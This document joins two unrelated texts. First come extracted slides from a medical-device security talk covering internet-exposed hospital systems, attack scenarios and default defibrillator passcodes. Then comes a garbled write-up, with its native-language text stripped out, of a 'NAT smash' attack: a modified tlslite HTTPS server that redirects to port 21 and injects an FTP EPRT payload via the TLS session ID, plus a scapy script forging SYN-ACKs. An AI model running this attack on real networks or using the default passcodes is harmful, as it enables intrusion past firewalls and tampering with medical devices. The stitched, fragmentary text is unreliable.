• @silentbreaksec"
• hCps://github.com/silentbreaksec" | pdf |
JUST WHAT THE DOCTOR ORDERED?
SCOTT ERVEN
Founder/President – SecMedic
@scotterven
SHAWN MERDINGER
Healthcare Security Researcher
Founder – MedSec LinkedIn Group
@medseclinkedin
1
Why Research Medical Devices?
• Patient Safety & Quality Patient Care
• To Equip Defenders In Assessing &
Protecting These Life Saving Devices
• Directly Contributes To & Affects Healthcare
Organizations’ Mission and Values
2
Disclosure Process Overview
• April 30th – SMB Findings Disclosed To
DHS/ICS-CERT
• May 5th – SMB Detailed Briefing With
DHS/ICS-CERT
• May 20th – Additional Disclosure To
DHS/ICS-CERT for Defibs, Healthcare Orgs
• Ongoing Assistance Provided To Federal
Agencies, Healthcare Organizations and
Manufacturers
3
What Will Be Revealed?
• No Zero Days
• Most Vulnerabilities Not From This Decade
• Threat Modeling – Connecting The Dots
• Medical Device Exposure From Public
Internet
4
Bad News
• The external findings pose a significant risk to
patient safety and medical devices
• We located most of these external risks within
1 hour utilizing only previously disclosed
vulnerabilities and open source
reconnaissance
• These findings provide support that
Healthcare is 10 years behind other
industries in addressing security
5
Good News
• These significant external risks can be
mitigated easily
• The external risks can be identified by an
organization within 1 hour using open source
reconnaissance tools
• The external findings can be remediated with
little to no investment from an organization
6
Review of Previous Research
• Lab Systems
• Refrigeration Storage
• PACS – Imaging
• MRI/CT
• Implantable Cardiac Defibrillators
• External Cardiac Defibrillators
• Infusion Pumps
• Medical Device Integration
7
Review of Previous Research - Top Risks
• Hard-Coded Privileged Accounts
• Unencrypted Web Applications & Web
Services/Interfaces
• Excessive Services With No Operational Use
Case
• System Updates & Patching
8
Phase II Research – Why Do More?
• Many have been misinformed that medical
devices can not be accessed by an attacker
from the Internet.
– “The biggest vulnerability was the perception of IT health
care professionals’ beliefs that their current perimeter
defenses and compliance strategies were working when
clearly the data states otherwise.” – FBI Advisory April 8th,
2014 PIN#140408-009
• Physicians and public are unaware or have
been misinformed about the risks associated
with these life saving devices.
9
Phase II Research – Why Do More?
• “I have never seen an industry with more
gaping holes. If our financial industry
regarded security the way the health-care
sector does, I would stuff my cash in a
mattress under my bed.”
–
Avi Rubin, John Hopkins University 2012/12/25
10
Shodan Search & Initial Finding
• Doing a search for anesthesia in Shodan and
realized it was not an anesthesia workstation.
• Realized it was a public facing system with
SMB open, and it was leaking intelligence
about the healthcare organization’s entire
network including medical devices.
11
Initial Healthcare Organization Discovery
• Very large US healthcare system consisting
of over 12,000 employees and over 3,000
physicians. Including large cardiovascular
and neuroscience institutions.
• Exposed intelligence on over 68,000 systems
and provided direct attack vector to the
systems.
• Exposed numerous connected third-party
organizations and healthcare systems.
12
So Did We Only Find One?
• Of Course Not. We Found Hundreds!!
• Change the search term and many more
come up. Potentially thousands if you include
exposed third-party healthcare systems.
13
Heat Map – Health*
14
Heat Map - Clinic
15
Heat Map - Hospital
16
Heat Map - Medical
17
So Who Cares About SMB Right?
• Well it also happened to be a Windows XP
system vulnerable to MS08-067 in many
instances!! CVE-2008-4250
18
Why Does This Matter?
• It’s A Goldmine For Adversaries & Attackers!!
• It leaks specific information to identify medical
devices and their supporting technology
systems and applications.
• It leaks system hostnames on connected
devices in the network.
• It often times leaks floor, office, physician
name and also system timeout exemptions. 19
Let Me Paint The Picture.
Impact:
System May Not Require Login
Impact:
Electronic Medical Record Systems 20
Getting a little warmer!!
Impact: PACS Imaging Systems, MRI/CT Systems
Impact: Infant Abduction Systems
21
This Is Not Good.
Impact:
Pacemaker Controller Systems
Pediatric Nuclear Medicine
Anesthesia Systems
22
OK You Found A Few Devices Right?
• Wrong!!
• We dumped the raw data on the organization
and extracted the following information on
medical devices and their supporting
systems.
• We identified thousands of medical devices
and their supporting systems inside this
organization.
23
Summary Of Devices Inside Organization
• Anesthesia Systems – 21
• Cardiology Systems – 488
• Infusion Systems – 133
• MRI – 97
• PACS Systems – 323
• Nuclear Medicine Systems – 67
• Pacemaker Systems - 31
24
Potential Attacks – Physical Attack
• We know what type of systems and medical
devices are inside the organization.
• We know the healthcare organization and
location.
• We know the floor and office number
• We know if it has a lockout exemption
25
Potential Attacks – Phishing Attack
• We know what type of systems and medical
devices are inside the organization.
• We know the healthcare organization and
employee names.
• We know the hostname of all these devices.
• We can create a custom payload to only
target medical devices and systems with
known vulnerabilities.
26
Potential Attacks – Pivot Attack
• We know the direct public Internet facing
system is vulnerable to MS08-067 and is
Windows XP.
• We know it is touching the backend networks
because it is leaking all the systems it is
connected to.
• We can create a custom payload to pivot to
only targeted medical devices and systems
with known vulnerabilities.
27
Potential Attacks – Targeted Attack
• We can use any of the previous three attack
vectors.
• We now know their Electronic Medical Record
system and server names to attack and gain
unauthorized access. This can tell an
attacker where a patient will be and when.
• We can launch a targeted attack at a specific
location since we know specific rooms these
devices are located in.
28
Disclosure Overview & Results – Big Win!
• DHS/ICS-CERT Coordinated Disclosure
• DHS/ICS-CERT Coordinated Follow-Up Call
With Affected Organization
• Affected Organization Shared Incident
Response Documentation
• First Time DHS/ICS-CERT Had Coordinated
Security Researchers & Healthcare
Organization
29
Are Medical Devices On Public Internet?
• Yes They Are
• In Many Cases It Is By Design
• In Many Cases They Utilize Public Cellular
Carrier Networks
30
So Did We Find Anything Public Facing?
• Defibrillators
• Fetal/Infant Monitoring Systems
• EEG Systems
• PACS/Imaging Systems
31
What Else Was Accessible?
• Healthcare Systems
– Unauthenticated Edge Routers
• Device Manufacturer Infrastructure
• Third-Party Contracted Organizations
32
Case Study – Glucose Meters
• 1st Reported Medical Device On Public IP
– Late 2012
• Roche Glucose Meter
– Basestation Has Telnet Open
• Excellent Vendor Response
• Excellent DHS/ICS-CERT
Response
33
Case Study – Kodak PACS Systems
• Hundreds Sitting On Public IP
• Issues
– Client Connectivity Requires Old Browser
– Internet Explorer 6.0
• Dedicated Client Box Only For This?
34
Case Study – Fetal Monitors
• May 18th – Fetal Monitor Findings Disclosed
To DHS/ICS-CERT, Manufacturer, FDA,
OCR, Joint Commission
• Previous Disclosure
– Dec. 2012 - Fetal monitor findings reported to
DHS ICS-CERT
– Media Coverage
• 3/25/2013
– http://www.wired.com/2013/03/our-health-information/
• 9/5/2013
– http://www.forbes.com/sites/kashmirhill/2013/09/05/the-
crazy-things-a-savvy-shodan-searcher-can-find-exposed-
on-the-internet/
35
Case Study – 28 Fetal Monitors
• Shodan Map Of Fetal Monitors On Public IP
36
Case Study – Fetal Monitors
• System Details
– Windows 2003 Server
• IIS 6.0 (16 Systems) – Behind On Vendor Updates
– Windows 2008 Server
• IIS 7.0 (12 Systems)
• Remote Access For Physicians/Support
– Remote Desktop Web Access Through Browser
– Terminal Services Clients
• HIPAA Compliant RDP Crypto Access?
37
Case Study – Fetal Monitors
• FDA MAUDE Reports
– Several Cases Of Fetal Alarm Capability Disabled
• Is There Correlation To Exposed Devices?
– Impossible To Tell From MAUDE Alone
• User Submitted Reports
• Sanitized Data
• Attachments Removed
• BTW - MAUDE Reports And Search Interface
Are “Teh Suck”
38
Case Study – Fetal Monitors
• So Where Are We Today?
– I Previously Disclosed This To DHS In Fall 2012
– Many Still On Public IP
– Several Still Running IIS 6.0
• Vendor Did Reach Out
– Conference Call, Interest In Customer Misuse
Cases, Security Researcher Communication
• Lessons Learned
– Need Better Reporting Method
– Need Follow-Up Action
– Need Authority For Location Identification
39
Adversary Misconceptions
• Adversaries Only Care About Financial Gain
– OK Maybe The Russians Do!!
• Adversaries Live In Caves & Can’t Figure It Out
– I Swear Some Ignorant Individual Actually Emailed Me This.
• Adversaries Are Not Technically Adept To Carry Out
An Attack On Medical Devices
– Everything We Just Showed You Requires Little Skill To
Execute. Basic Security Concepts. Open Source
Reconnaissance & Publicly Disclosed Vulnerabilities.
40
Adversaries We Should Worry About
• Terrorists/Extremists
– Especially Technically Adept & Active Adversaries Like ISIS.
• Nation State
– State Sponsored Actors
• Patients Themselves
– Patients Downloaded Documentation, Retrieved Service
Technician Login And Changed Infusion Pump Dosage
• http://austriantimes.at/news/General_News/2012-12-
01/45780/Patient_hackers_managed_to_dial_a_drug_in_hospital
41
Adversary Attack Model
• Greatest Risk Is A Combined Attack
– Event Such As Boston Marathon Bombing Or 9/11 In
Conjunction With Attacking Healthcare System Or Power
Plant, etc..
• Really Is That A Risk?
– Our Government Thinks So. You Probably Should Listen.
• CyberCity – Ed Skoudis/Counter Hack
- http://www.washingtonpost.com/investigations/cybercity-
allows-government-hackers-to-train-for-
attacks/2012/11/26/588f4dae-1244-11e2-be82-
c3411b7680a9_story.html
42
Has An Attack Already Happened?
• How Would You Know If A Medical Device Was
Hacked?
– Closed Source Code
– Specialized Diagnostic Equipment, Proprietary Protocols
• Lack Of Forensic Capabilities In Medical Devices
– Lack Of Medical Device Forensic Experts
– Only 2 On Linked-In, FDA & Ret. FBI
– FDA Only Adjudicates Devices For Generic “Malfunction”
• How Do You Prove An Attack Or Adverse Event
Without Evidence Or Audit Log Trail?
43
Doesn’t HIPAA Protect Us?
It Must Be Ineffective
• Yes I Get These Emails As Well!! I Won’t
Argue The Ineffectiveness!!
• HIPAA Focuses On Privacy Of Patient Data
• HIPAA Does Not Focus On Medical Device
Security
• HIPAA Does Not Focus On Adversary
Resilience Testing And Mitigation
44
Doesn’t FDA, DHS, FBI, HHS, etc..
Protect Us?
• No. It’s Your Responsibility To Secure Your
Environment.
• They Have Told You With Recent Advisories
To Start Testing These Devices And
Assessing Risk.
• ICS-ALERT-13-164-01
• FDA UCM356423
• FBI PIN # 140408-009
45
What Caused These Issues In Healthcare?
• HIPAA Drives Information Security Program &
Budget
• Security Is Not Compliance/Information
Assurance
• Check Box Security Is Not Effective
• Policy Does Not Prevent Adversarial Risks
46
What Caused Issues In Manufacturers?
• Never Had To Design For Adversarial
Threats
• Just Starting To Build Information Security
Teams
• Historically Focused On Regulatory
Compliance Just Like Healthcare
• Haven’t Fully Embraced Partnering With
Security Researchers
47
Common Disconnects With Manufacturers
• Been Told They Can’t Patch/Update Systems
– http://www.fda.gov/medicaldevices/deviceregulatio
nandguidance/guidancedocuments/ucm077812.ht
m
• Been Told They Can’t Change Hard-Coded
Admin (Support) Accounts
• Biomed – IS/Information Security Integration
• Know Your Manufacturer’s Information
Security Employees – Maintain Relationship 48
Patching Questions
• Yes You Can…But Should You?
• Complex Ecosystem Of Medical Devices
– Leased, 3rd Party Managed, Multi-Vendor
• What If Patch Breaks Medical Device Or
Results In Patient Safety Issue?
– Liability
• Many Healthcare Organizations Reluctant To
Patch Or Modify Medical Devices
49
Anti-Virus Questions
• Several FDA MAUDE Reports Of Negative
Impact
• McAfee DAT 5958 on 21 April, 2010
– Svschost.exe Flagged As Wecorl-A Resulted In
Continuous Reboot Of Systems
– 1/3rd Of Hospitals In Rhode Island Impacted
• AV Deleted Fetal Monitor Logs (7 Hours)
– http://hosted.verticalresponse.com/250140/86af97
f052/
50
Solutions & Recommendations
• External Attack Surface Reduction & Hardening
• Recognize & Mitigate Your Exposure To Tools Like
Shodan
– Shodan API = Automation
– Needs Continual Monitoring, Roll Your Own
– Other Fast Scanning Tools: Masscan, ZMAP
• Make Your External Perimeter Metasploit Proof
– Yes You Actually Have To Use Metasploit
51
Solutions & Recommendations
• Stop The Bleeding
– Remove SMB Services
• Adversarial Resilience Testing
– Red Teaming
– Harden Edge Devices To Applicable NIST Standards
52
Needs From Healthcare Industry
• Internal programs focused on medical device
security to include device security testing
• Require security testing during vendor
selection and procurement process
• Work to show organization you are
supporting their mission and values
53
Needs From Healthcare Industry
• Request MDS2 Forms From Vendors
– Incorporate Into Contract With Penalties
• Responsibly Disclose Findings To
Manufacturer, FDA, DHS/ICS-CERT
– Possibly HHS OCR, FBI, FTC
• Demand Vulnerabilities Are Remediated
– Incorporate Into Contract With Penalties
– Incorporate Indemnification Clauses Into Contract
54
Recommended Disclosure Reporting
• Individual Researchers
– DHS/ICS-CERT
– FDA
– Manufacturer – If Possible
– CVE, OSVDB If Appropriate
• Healthcare Organizations
– Manufacturer
– DHS/ICS-CERT
– FDA
– CVE, OSVDB If Appropriate
55
Accessibility Of Medical Devices
• Difficult To Get Hands On Medical Devices
– Many Devices Are Rx Only
– Many Devices Are Very Expensive
• Independent Research Options
– Ebay or MEDWOW (Can Be End-Of-Life, Recalled)
– Hack Your Own Device
• Consultant
– Most Often End Up Under NDA
– Starting To See Non-Identifiable Data Clauses
56
Do You Really Need The Medical Device?
• Use Search Engines To Locate Service
Manuals
– Contain Detailed Systems & Operations
Information
– Contain Support Or Service Technician Login
Information
– Contain Detailed Architecture & Schematics
57
Case Study – Defibrillators
• Located Zoll X Series Defibrillators On Public
IP Space
58
Case Study – Defibrillators
• You Need A Certificate For Web Interface.
– Thank God It’s On The Landing Page!!!!
59
Case Study – Defibrillators
• Defibrillator Also Is First To Market With
Integrated Wireless & Bluetooth Interfaces
– By Design Of Course
60
Case Study – Defibrillators
• Wireless & Bluetooth Interfaces Also Have
Direct Access To Communications Processor
– Utilizes UART Interface
61
Case Study – Defibrillators
• Communications Processor Must Be
Separated Completely From Main Monitor
Board Right?
– Debug Is Located On GPS UART On CP
– Schematics Show Communication Back To Main
Monitor Board As Well
– Note USB On Same Circuit Back To Main Board
62
Case Study – Defibrillators
• In Order To Import Configuration You Utilize
USB With A File Named ZollConfig.xml
63
Case Study – Defibrillators
• Critical Configuration Values
• Alarm Parameters
64
Case Study – Defibrillators
• Default Patient Mode
• Factory Reset
65
Case Study – Defibrillators
• Supervisor Access
• Supervisor Mode Config Settings
66
Case Study – Defibrillators
• Supervisor Default Login
• Clearing Logs
67
Case Study – Defibrillators
• So Who Thinks This Is A Secure Design?
• So Is This A Problem In Only One Product
Line?
– Of Course Not
68
Case Study – Defibrillators
• Zoll M Series Defibrillator
– System Config – 00000000
• Zoll R Series Defibrillator/Monitor
– System Config – 00000000
• Zoll E Series Defibrillator/Monitor
– System Config – 00000000
• Zoll X Series Defibrillator/Monitor
– Supervisor Passcode – 1234
– Service Passcode - 1234
69
How Are Vendors Changing?
• They Have Started Talking To Researchers
• Owlet Baby Care – Huge Shout Out!!
– Stepped Up And Is Letting Us Test Security Of Device Prior
To Market
– Recognizes Patient Safety Concerns Due To Security
Vulnerabilities
• Philips Healthcare Released Responsible Disclosure
Positioning
70
November 01, 2013 _Sector Confidential
71
Philips Healthcare
Responsible Disclosure
Positioning
Product Security & Services Office
Philips Healthcare
August 2014
November 01, 2013 _Sector Confidential
72
Philips Healthcare Responsible Disclosure Positioning
•
Philips Healthcare and Responsible Disclosure
•
Philips Healthcare recognizes the need for clear a Responsible Disclosure Policy and protocols as part
of its Product Security function.
•
The company is developing a Responsible Disclosure Policy according to current industry best
practices.
– The policy will be publicly accessible, with clear communications channels for customers,
researchers and other security community stakeholders.
– The policy will be based on principles of transparency, accountability and responsiveness.
– The policy will outline defined protocols for reporting and response, managed by the Philips
Product Security Team.
The policy protocols will encompass:
•
Monitoring and response of inbound communications
•
Managing confirmation receipt and follow-up communication with senders
•
Evaluation of vulnerability notifications and status tracking
•
Alignment with incident response, stakeholder notification, remediation and prevention
protocols as required
•
Philips has actively sought out researcher and analyst input to help guide policy design and
projected implementation.
– The company has increasingly engaged with the security research community over the past year.
– Philips is committed to ongoing dialogue with the security community and to productive
partnerships.
How To Help?
• Looking For Android/iOS Security Researchers To
Collaborate On Healthcare Application Security
• Seeking Collaboration With Physicians & Patients
73
Gr33tz
• Barnaby Jack
• John Matherly
• Terry McCorkle
• Jay Radcliffe
• Billy Rios
• DHS/ICS-CERT
• FDA/HHS/CDRH
• FBI
Roche Diagnostics
Philips Healthcare
74
Contact Info
• Scott Erven
– @scotterven
– @secmedic
– [email protected]
• Shawn Merdinger
– @medseclinkedin
– [email protected]
75 | pdf |
nat smashdemo
0x00
1. httpstls sessionid
2. sessionidpayload
3. sessionid
4.
5. sessionidtls
6. sessionid
7. tcp windowsessionid
0x01
1. scapytcpack
2. https://github.com/tlsfuzzer/tlslite-ng wendellpytls
tlslite/tlsconnection.pypip/ usr/local/lib/python3.8/dist-
packages/tlslite/tlsconnection.py
httpshttpspayload
payload \nEPRT |1|IP|port| tcpwindow
32
0x02
demo
1. tlssessionidhttps21
2. sessionid302sessionid21
3. tcp window21httpsscapy
4. scapy21tcpsyn+acktcp windowpsh
windowpshackseqackftp
alg
tips
javahttpconnectionrunrunjava
sessionid12httpstcp
21302kill21https
21scapy21https21
sessionid21
scapyssrf21
0x03
httpsservergithub
To run an HTTPS server with less typing, run ./tests/httpsserver.sh.
https://github.com/tlsfuzzer/tlslite-ng/blob/master/tests/httpsserver.sh
httpsserverscript/tls.pyurl
ipurl
natsmash-tlsserver1.py
21https serverdo_GET
#!/usr/bin/python3
# Authors:
# Trevor Perrin
# Marcelo Fernandez - bugfix and NPN support
# Martin von Loewis - python 3 port
#
# See the LICENSE file for legal information regarding use of this file.
from __future__ import print_function
import sys
import os
import os.path
import socket
import time
import getopt
import binascii
import _thread
from scapy.all import *
try:
import httplib
from SocketServer import *
from BaseHTTPServer import *
from SimpleHTTPServer import *
except ImportError:
# Python 3.x
from http import client as httplib
from socketserver import *
from http.server import *
from http.server import SimpleHTTPRequestHandler
if __name__ != "__main__":
raise "This must be run as a command, not used as a module!"
from tlslite.api import *
from tlslite.constants import CipherSuite, HashAlgorithm, SignatureAlgorithm, \
GroupName, SignatureScheme
from tlslite import __version__
from tlslite.utils.compat import b2a_hex
from tlslite.utils.dns_utils import is_valid_hostname
try:
from tack.structures.Tack import Tack
except ImportError:
pass
def printUsage(s=None):
if s:
print("ERROR: %s" % s)
print("")
print("Version: %s" % __version__)
print("")
print("RNG: %s" % prngName)
print("")
print("Modules:")
if tackpyLoaded:
print(" tackpy : Loaded")
else:
print(" tackpy : Not Loaded")
if m2cryptoLoaded:
print(" M2Crypto : Loaded")
else:
print(" M2Crypto : Not Loaded")
if pycryptoLoaded:
print(" pycrypto : Loaded")
else:
print(" pycrypto : Not Loaded")
if gmpyLoaded:
print(" GMPY : Loaded")
else:
print(" GMPY : Not Loaded")
print("")
print("""Commands:
server
[-k KEY] [-c CERT] [-t TACK] [-v VERIFIERDB] [-d DIR] [-l LABEL] [-L LENGTH]
[--reqcert] [--param DHFILE] HOST:PORT
client
[-k KEY] [-c CERT] [-u USER] [-p PASS] [-l LABEL] [-L LENGTH] [-a ALPN]
HOST:PORT
LABEL - TLS exporter label
LENGTH - amount of info to export using TLS exporter
ALPN - name of protocol for ALPN negotiation, can be present multiple times
in client to specify multiple protocols supported
DHFILE - file that includes Diffie-Hellman parameters to be used with DHE
key exchange
""")
sys.exit(-1)
def printError(s):
"""Print error message and exit"""
sys.stderr.write("ERROR: %s\n" % s)
sys.exit(-1)
def handleArgs(argv, argString, flagsList=[]):
# Convert to getopt argstring format:
# Add ":" after each arg, ie "abc" -> "a:b:c:"
getOptArgString = ":".join(argString) + ":"
try:
opts, argv = getopt.getopt(argv, getOptArgString, flagsList)
except getopt.GetoptError as e:
printError(e)
# Default values if arg not present
privateKey = None
certChain = None
username = None
password = None
tacks = None
verifierDB = None
reqCert = False
directory = None
expLabel = None
expLength = 20
alpn = []
dhparam = None
for opt, arg in opts:
if opt == "-k":
s = open(arg, "rb").read()
if sys.version_info[0] >= 3:
s = str(s, 'utf-8')
# OpenSSL/m2crypto does not support RSASSA-PSS certificates
privateKey = parsePEMKey(s, private=True,
implementations=["python"])
elif opt == "-c":
s = open(arg, "rb").read()
if sys.version_info[0] >= 3:
s = str(s, 'utf-8')
x509 = X509()
x509.parse(s)
certChain = X509CertChain([x509])
elif opt == "-u":
username = arg
elif opt == "-p":
password = arg
elif opt == "-t":
if tackpyLoaded:
s = open(arg, "rU").read()
tacks = Tack.createFromPemList(s)
elif opt == "-v":
verifierDB = VerifierDB(arg)
verifierDB.open()
elif opt == "-d":
directory = arg
elif opt == "--reqcert":
reqCert = True
elif opt == "-l":
expLabel = arg
elif opt == "-L":
expLength = int(arg)
elif opt == "-a":
alpn.append(bytearray(arg, 'utf-8'))
elif opt == "--param":
s = open(arg, "rb").read()
if sys.version_info[0] >= 3:
s = str(s, 'utf-8')
dhparam = parseDH(s)
else:
assert(False)
# when no names provided, don't return array
if not alpn:
alpn = None
if not argv:
printError("Missing address")
if len(argv)>1:
printError("Too many arguments")
#Split address into hostname/port tuple
address = argv[0]
address = address.split(":")
if len(address) != 2:
raise SyntaxError("Must specify <host>:<port>")
address = ( address[0], int(address[1]) )
# Populate the return list
retList = [address]
if "k" in argString:
retList.append(privateKey)
if "c" in argString:
retList.append(certChain)
if "u" in argString:
retList.append(username)
if "p" in argString:
retList.append(password)
if "t" in argString:
retList.append(tacks)
if "v" in argString:
retList.append(verifierDB)
if "d" in argString:
retList.append(directory)
if "reqcert" in flagsList:
retList.append(reqCert)
if "l" in argString:
retList.append(expLabel)
if "L" in argString:
retList.append(expLength)
if "a" in argString:
retList.append(alpn)
if "param=" in flagsList:
retList.append(dhparam)
return retList
def printGoodConnection(connection, seconds):
print(" Handshake time: %.3f seconds" % seconds)
print(" Version: %s" % connection.getVersionName())
print(" Cipher: %s %s" % (connection.getCipherName(),
connection.getCipherImplementation()))
print(" Ciphersuite: {0}".\
format(CipherSuite.ietfNames[connection.session.cipherSuite]))
if connection.session.srpUsername:
print(" Client SRP username: %s" % connection.session.srpUsername)
if connection.session.clientCertChain:
print(" Client X.509 SHA1 fingerprint: %s" %
connection.session.clientCertChain.getFingerprint())
else:
print(" No client certificate provided by peer")
if connection.session.serverCertChain:
print(" Server X.509 SHA1 fingerprint: %s" %
connection.session.serverCertChain.getFingerprint())
if connection.version >= (3, 3) and connection.serverSigAlg is not None:
scheme = SignatureScheme.toRepr(connection.serverSigAlg)
if scheme is None:
scheme = "{1}+{0}".format(
HashAlgorithm.toStr(connection.serverSigAlg[0]),
SignatureAlgorithm.toStr(connection.serverSigAlg[1]))
print(" Key exchange signature: {0}".format(scheme))
if connection.ecdhCurve is not None:
print(" Group used for key exchange: {0}".format(\
GroupName.toStr(connection.ecdhCurve)))
if connection.dhGroupSize is not None:
print(" DH group size: {0} bits".format(connection.dhGroupSize))
if connection.session.serverName:
print(" SNI: %s" % connection.session.serverName)
if connection.session.tackExt:
if connection.session.tackInHelloExt:
emptyStr = "\n (via TLS Extension)"
else:
emptyStr = "\n (via TACK Certificate)"
print(" TACK: %s" % emptyStr)
print(str(connection.session.tackExt))
if connection.session.appProto:
print(" Application Layer Protocol negotiated: {0}".format(
connection.session.appProto.decode('utf-8')))
print(" Next-Protocol Negotiated: %s" % connection.next_proto)
print(" Encrypt-then-MAC: {0}".format(connection.encryptThenMAC))
print(" Extended Master Secret: {0}".format(
connection.extendedMasterSecret))
def printExporter(connection, expLabel, expLength):
if expLabel is None:
return
expLabel = bytearray(expLabel, "utf-8")
exp = connection.keyingMaterialExporter(expLabel, expLength)
exp = b2a_hex(exp).upper()
print(" Exporter label: {0}".format(expLabel))
print(" Exporter length: {0}".format(expLength))
print(" Keying material: {0}".format(exp))
def clientCmd(argv):
(address, privateKey, certChain, username, password, expLabel,
expLength, alpn) = \
handleArgs(argv, "kcuplLa")
if (certChain and not privateKey) or (not certChain and privateKey):
raise SyntaxError("Must specify CERT and KEY together")
if (username and not password) or (not username and password):
raise SyntaxError("Must specify USER with PASS")
if certChain and username:
raise SyntaxError("Can use SRP or client cert for auth, not both")
if expLabel is not None and not expLabel:
raise ValueError("Label must be non-empty")
#Connect to server
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(5)
sock.connect(address)
connection = TLSConnection(sock)
settings = HandshakeSettings()
settings.useExperimentalTackExtension = True
try:
start = time.perf_counter()
if username and password:
connection.handshakeClientSRP(username, password,
settings=settings, serverName=address[0])
else:
connection.handshakeClientCert(certChain, privateKey,
settings=settings, serverName=address[0], alpn=alpn)
stop = time.perf_counter()
print("Handshake success")
except TLSLocalAlert as a:
if a.description == AlertDescription.user_canceled:
print(str(a))
else:
raise
sys.exit(-1)
except TLSRemoteAlert as a:
if a.description == AlertDescription.unknown_psk_identity:
if username:
print("Unknown username")
else:
raise
elif a.description == AlertDescription.bad_record_mac:
if username:
print("Bad username or password")
else:
raise
elif a.description == AlertDescription.handshake_failure:
print("Unable to negotiate mutually acceptable parameters")
else:
raise
sys.exit(-1)
printGoodConnection(connection, stop-start)
printExporter(connection, expLabel, expLength)
connection.close()
def serverCmd(argv):
(address, privateKey, certChain, tacks, verifierDB, directory, reqCert,
expLabel, expLength, dhparam) = handleArgs(argv, "kctbvdlL",
["reqcert", "param="])
if (certChain and not privateKey) or (not certChain and privateKey):
raise SyntaxError("Must specify CERT and KEY together")
if tacks and not certChain:
raise SyntaxError("Must specify CERT with Tacks")
print("I am an HTTPS test server, I will listen on %s:%d" %
(address[0], address[1]))
if directory:
os.chdir(directory)
print("Serving files from %s" % os.getcwd())
if certChain and privateKey:
print("Using certificate and private key...")
if verifierDB:
print("Using verifier DB...")
if tacks:
print("Using Tacks...")
if reqCert:
print("Asking for client certificates...")
#############
sessionCache = SessionCache()
username = None
sni = None
if is_valid_hostname(address[0]):
sni = address[0]
class MySimpleHTTPHandler(SimpleHTTPRequestHandler, object):
"""Buffer the header and body of HTTP message."""
wbufsize = -1
def do_GET(self):
if self.path.startswith('/abc'):
self.wfile.write(b'HTTP/1.0 302 Found\r\n')
self.wfile.write(b'Location: https://172.28.64.142:80/abc\r\n')
#self.wfile.write(b'Host: 172.28.64.142\r\n')
self.wfile.write(b'Content-type: text/html; charset=UTF-8\r\n')
#self.wfile.write(b'Content-Length: 0\r\n\r\n')
self.wfile.write(b'Connection: close\r\n')
return
"""Simple override to send KeyUpdate to client."""
if self.path.startswith('/keyupdate'):
for i in self.connection.send_keyupdate_request(
KeyUpdateMessageType.update_requested):
if i in (0, 1):
continue
else:
raise ValueError("Invalid return from "
"send_keyupdate_request")
if self.path.startswith('/secret') and not request_pha:
try:
for i in self.connection.request_post_handshake_auth():
pass
except ValueError:
self.wfile.write(b'HTTP/1.0 401 Certificate authentication'
b' required\r\n')
self.wfile.write(b'Connection: close\r\n')
self.wfile.write(b'Content-Length: 0\r\n\r\n')
return
self.connection.read(0, 0)
if self.connection.session.clientCertChain:
print(" Got client certificate in post-handshake auth: "
"{0}".format(self.connection.session
.clientCertChain.getFingerprint()))
else:
print(" No certificate from client received")
self.wfile.write(b'HTTP/1.0 401 Certificate authentication'
b' required\r\n')
self.wfile.write(b'Connection: close\r\n')
self.wfile.write(b'Content-Length: 0\r\n\r\n')
return
return super(MySimpleHTTPHandler, self).do_GET()
class MyHTTPServer(ThreadingMixIn, TLSSocketServerMixIn, HTTPServer):
def __init__(self,a,b):
self.tlstimes = 0
super(HTTPServer,self).__init__(a,b)
def handshake(self, connection):
if self.tlstimes !=0:
#time.sleep(100)
pass
self.tlstimes = self.tlstimes+1
print("About to handshake...")
activationFlags = 0
if tacks:
if len(tacks) == 1:
activationFlags = 1
elif len(tacks) == 2:
activationFlags = 3
try:
start = time.perf_counter()
settings = HandshakeSettings()
settings.useExperimentalTackExtension=True
settings.dhParams = dhparam
connection.handshakeServer(certChain=certChain,
privateKey=privateKey,
verifierDB=verifierDB,
tacks=tacks,
activationFlags=activationFlags,
sessionCache=sessionCache,
settings=settings,
nextProtos=[b"http/1.1"],
alpn=[bytearray(b'http/1.1')],
reqCert=reqCert,
sni=sni)
# As an example (does not work here):
#nextProtos=[b"spdy/3", b"spdy/2", b"http/1.1"])
stop = time.perf_counter()
except TLSRemoteAlert as a:
if a.description == AlertDescription.user_canceled:
print(str(a))
return False
else:
raise
except TLSLocalAlert as a:
if a.description == AlertDescription.unknown_psk_identity:
if username:
print("Unknown username")
return False
else:
raise
elif a.description == AlertDescription.bad_record_mac:
if username:
print("Bad username or password")
return False
else:
raise
elif a.description == AlertDescription.handshake_failure:
print("Unable to negotiate mutually acceptable parameters")
return False
else:
raise
connection.ignoreAbruptClose = True
printGoodConnection(connection, stop-start)
printExporter(connection, expLabel, expLength)
return True
def runhttpd(httpd):
httpd.serve_forever(5)
httpd = MyHTTPServer(address, MySimpleHTTPHandler)
_thread.start_new_thread(runhttpd, (httpd,))
while True:
if httpd.tlstimes == 1:
httpd.shutdown()
break
else:
pass
# httpd.serve_forever(20)
if __name__ == '__main__':
if len(sys.argv) < 2:
printUsage("Missing command")
elif sys.argv[1] == "client"[:len(sys.argv[1])]:
clientCmd(sys.argv[2:])
elif sys.argv[1] == "server"[:len(sys.argv[1])]:
serverCmd(sys.argv[2:])
else:
printUsage("Unknown command: %s" % sys.argv[1])
natsmash-tlsTCPserver.py
scapy21
ipwindow
#!/usr/bin/python
from scapy.all import *
import time
while True:
# Wait for the SYN of the client
a = sniff(count=2, filter="tcp[tcpflags] & (tcp-syn)!=0 and host 172.28.64.142 and dst port 21")
# Initializing some variables for later use.
ValueOfPort = a[1].sport
a[1].show()
SeqNr = a[1].seq
AckNr = a[1].seq + 1 # We are Syn-Acking, so this must be +1
# Generating the IP layer:
ip = IP(src="172.28.64.142", dst="172.28.64.19")
# Generating TCP layer: src port 80, dest port of client,
# flags SA means "Syn-Ack", the AckNr ist +1, and the MSS shall be a default 1460.
####window
TCP_SYNACK = TCP(window=50,sport=21, dport=ValueOfPort, flags="SA", seq=SeqNr, ack=AckNr, options=[('MSS', 1460)])
#send SYNACK to remote host AND receive ACK
GEThttp = sr1(ip/TCP_SYNACK)
natsmash-redirectserver.py
do_getsleep
#!/usr/bin/python3
# Authors:
# Trevor Perrin
# Marcelo Fernandez - bugfix and NPN support
# Capture next TCP packets with dport 80. (contains http GET request)
#GEThttp = sniff(filter="host 172.28.64.142 and port 21", count=1, prn=lambda x:x.sprintf("{IP:%IP.src%: %TCP.dport%}
# Updating the sequence number as well as the Ack number
#AckNr = AckNr+len(GEThttp[0].load)
#######+50windowwindow
